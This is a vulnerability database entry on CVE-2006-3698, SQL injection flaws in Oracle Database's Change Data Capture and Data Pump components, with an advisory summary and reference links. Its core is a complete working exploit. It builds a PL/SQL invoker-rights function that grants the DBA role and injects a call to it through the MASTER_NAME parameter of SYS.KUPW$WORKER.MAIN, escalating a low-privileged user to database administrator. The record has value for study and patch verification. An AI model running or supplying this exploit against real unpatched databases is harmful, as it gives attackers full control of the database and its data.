Oracle Database Multiple Unspecified Security Vulnerabilities

Vulnerability ID 1112094 Vulnerability type SQL injection
Published 2007-01-23 Updated 2007-01-23
CVE ID CVE-2006-3698 CNNVD-ID CNNVD-200607-365
Platform Multiple CVSS score 10.0
|Vulnerability source
https://www.exploit-db.com/exploits/3178
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200607-365
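|Vulnerability details
Oracle Database is a large commercial database system. Oracle released its Critical Patch Update advisory for July 2006, fixing multiple vulnerabilities in multiple Oracle products. These vulnerabilities affect all security properties of Oracle products and can lead to both local and remote threats. Some of them may require various levels of authorization, while others require none. The most severe vulnerabilities may lead to complete compromise of the database system. Oracle Database contains multiple unspecified security vulnerabilities with unspecified impact and attack vectors, aka Oracle Vuln# (1) DB01 for the Change Data Capture (CDC) component and (2) DB03 for the Data Pump Metadata API.
|Exploit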
/**
* Exploit for Oracle10g R1 and R2 prior to CPU Oct 2006
* Joxean Koret <joxeankoret@yahoo.es>
* Privileges needed:
*
* - CREATE SESSION
* - CREATE PROCEDURE
*
*/
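-- Roles held by the current user before the call
select *
  from user_role_privs
;

-- Invoker-rights function that carries the GRANT statement
CREATE OR REPLACE FUNCTION F1
  RETURN NUMBER AUTHID CURRENT_USER
IS
  PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN
  EXECUTE IMMEDIATE 'GRANT DBA TO TEST';
  COMMIT;
  RETURN(1);
END;
/

-- MASTER_NAME is passed to SYS.KUPW$WORKER.MAIN; the leading quote closes
-- the string literal and the rest appends a call to F1 to the statement
DECLARE
  MASTER_NAME  VARCHAR2(200);
  MASTER_OWNER VARCHAR2(200);
BEGIN
  MASTER_NAME  := ''' or ' || user || '.f1=1--';
  MASTER_OWNER := 'bla';
  SYS.KUPW$WORKER.MAIN(
    MASTER_NAME  => MASTER_NAME,
    MASTER_OWNER => MASTER_OWNER
  );
END;
/

-- Roles held by the current user after the call
select *
  from user_role_privs
;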

// milw0rm.com [2007-01-23]
|References

Source: US-CERT
Name: TA06-200A
Link: http://www.us-cert.gov/cas/techalerts/TA06-200A.html
Source: BID
Name: 19054
Link: http://www.securityfocus.com/bid/19054
Source: MISC
Link: http://www.red-database-security.com/advisory/oracle_cpu_july_2006.html
Source: www.oracle.com
Link: http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2006.html
Source: VUPEN
Name: ADV-2006-2863
Link: http://www.frsirt.com/english/advisories/2006/2863
Source: HP
Name: SSRT061201
Link: http://www.securityfocus.com/archive/1/archive/1/440758/100/100/threaded
Source: BUGTRAQ
Name: 20060718 Oracle Database - SQL Injection in SYS.DBMS_CDC_IMPDP [DB01]
Link: http://www.securityfocus.com/archive/1/archive/1/440440/100/0/threaded
Source: BUGTRAQ
Name: 20060718 Oracle Database - SQL Injection in SYS.KUPW$WORKER [DB03]
Link: http://www.securityfocus.com/archive/1/archive/1/440439/100/0/threaded
Source: MISC
Link: http://www.red-database-security.com/advisory/oracle_sql_injection_kupw$worker.html
Source: MISC
Link: http://www.red-database-security.com/advisory/oracle_sql_injection_dbms_cdc_impdp.html
Source: